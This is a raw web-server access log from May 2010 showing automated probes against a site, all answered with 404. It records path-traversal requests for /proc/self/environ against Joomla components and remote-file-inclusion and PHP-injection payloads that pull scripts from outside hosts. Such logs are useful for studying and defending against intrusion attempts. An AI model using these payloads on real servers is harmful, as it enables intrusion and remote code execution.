200.43.180.250 - - [30/May/2010:21:52:36 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:21:52:45 -0500] "GET /logs///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.834"
120.50.40.133 - - [30/May/2010:21:53:26 -0500] "GET /logs/access_log.1273363200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
66.7.198.40 - - [30/May/2010:21:53:32 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.7.198.40 - - [30/May/2010:21:53:32 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.7.198.40 - - [30/May/2010:21:53:32 -0500] "GET /logs/access_log.1271548800//components/com_simpleboard/image_upload.php?sbp=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
120.50.40.133 - - [30/May/2010:21:53:32 -0500] "GET ///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
120.50.40.133 - - [30/May/2010:21:53:43 -0500] "GET /logs///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
120.50.40.133 - - [30/May/2010:21:54:17 -0500] "GET /logs/access_log.1273017600///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.831"
91.121.201.191 - - [30/May/2010:21:56:27 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.43.180.250 - - [30/May/2010:21:58:26 -0500] "GET /logs/access_log.1274227200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
87.250.255.243 - - [30/May/2010:22:01:24 -0500] "GET /logs/access_log.1210896000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
123.243.67.208 - - [30/May/2010:22:02:31 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
200.43.180.250 - - [30/May/2010:22:05:23 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
120.50.40.133 - - [30/May/2010:22:06:00 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
123.243.67.208 - - [30/May/2010:22:11:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
174.121.58.89 - - [30/May/2010:22:11:51 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:11:52 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:11:52 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:12 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:12 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:12 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:23 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:23 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:23 -0500] "GET /logs/access_log.1272153600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:23 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:28 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:12:28 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:36 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:36 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:36 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:37 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:38 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:38 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:45 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:45 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:45 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
174.121.58.89 - - [30/May/2010:22:12:45 -0500] "GET /logs/access_log.1272153600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:13:37 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:13:37 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
62.44.82.61 - - [30/May/2010:22:13:37 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
91.121.201.191 - - [30/May/2010:22:13:58 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:22:13:59 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.201.191 - - [30/May/2010:22:13:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
174.121.58.89 - - [30/May/2010:22:14:23 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:14:25 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:14:25 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:14:25 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:14:32 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:14:32 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:14:32 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
62.44.82.61 - - [30/May/2010:22:15:15 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:16:08 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:16:17 -0500] "GET /logs/access_log.1223683200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://our.anet.com//modules/id6.pdf??? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
94.136.63.119 - - [30/May/2010:22:16:56 -0500] "GET /logs/access_log.1271808000//estrutura/enquetes/booth.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 340 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:16:56 -0500] "GET /logs//estrutura/enquetes/booth.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:16:56 -0500] "GET //estrutura/enquetes/booth.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
94.136.63.119 - - [30/May/2010:22:16:56 -0500] "GET /logs/access_log.1271548800//estrutura/enquetes/booth.php?include_path=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 340 "-""Mozilla/5.0"
91.121.201.191 - - [30/May/2010:22:17:44 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
200.43.180.250 - - [30/May/2010:22:18:57 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:22:19:03 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
200.43.180.250 - - [30/May/2010:22:20:49 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
213.128.84.14 - - [30/May/2010:22:29:08 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:08 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:08 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:12 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:13 -0500] "GET /logs/access_log.1273363200%20%20//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:13 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:33 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:33 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:33 -0500] "GET /logs/access_log.1272153600//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:34 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:38 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:38 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:38 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:29:39 -0500] "GET /logs/access_log.1272153600//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
209.216.201.8 - - [30/May/2010:22:30:06 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.814"
209.216.201.8 - - [30/May/2010:22:30:06 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.814"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET //poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET /logs/access_log.1273363200//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:30:24 -0500] "GET /logs//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.18.167.170 - - [30/May/2010:22:30:36 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.18.167.170 - - [30/May/2010:22:30:36 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
94.198.96.3 - - [30/May/2010:22:30:41 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
94.198.96.3 - - [30/May/2010:22:30:42 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
213.128.84.14 - - [30/May/2010:22:32:01 -0500] "GET /logs/access_log.1223683200%20%20//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:32:49 -0500] "GET /logs/access_log.1223683200%20%20//poll/poll_ssi.php?php_poll=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
120.50.40.133 - - [30/May/2010:22:38:02 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
120.50.40.133 - - [30/May/2010:22:38:03 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [30/May/2010:22:38:03 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
213.128.84.14 - - [30/May/2010:22:38:53 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:38:53 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:38:53 -0500] "GET /logs/access_log.1273363200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:00 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:01 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:01 -0500] "GET /logs/access_log.1273363200%20%20//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:07 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:07 -0500] "GET /logs/access_log.1273363200//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:07 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:09 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:09 -0500] "GET /logs/access_log.1273363200//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:09 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:32 -0500] "GET /logs//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 299 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:32 -0500] "GET //booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 294 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:32 -0500] "GET /logs/access_log.1271548800//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:22:39:32 -0500] "GET /logs/access_log.1272153600//booth.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.akiropes.com/administrator/templates/system/sc1? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
81.92.204.67 - - [30/May/2010:22:39:35 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
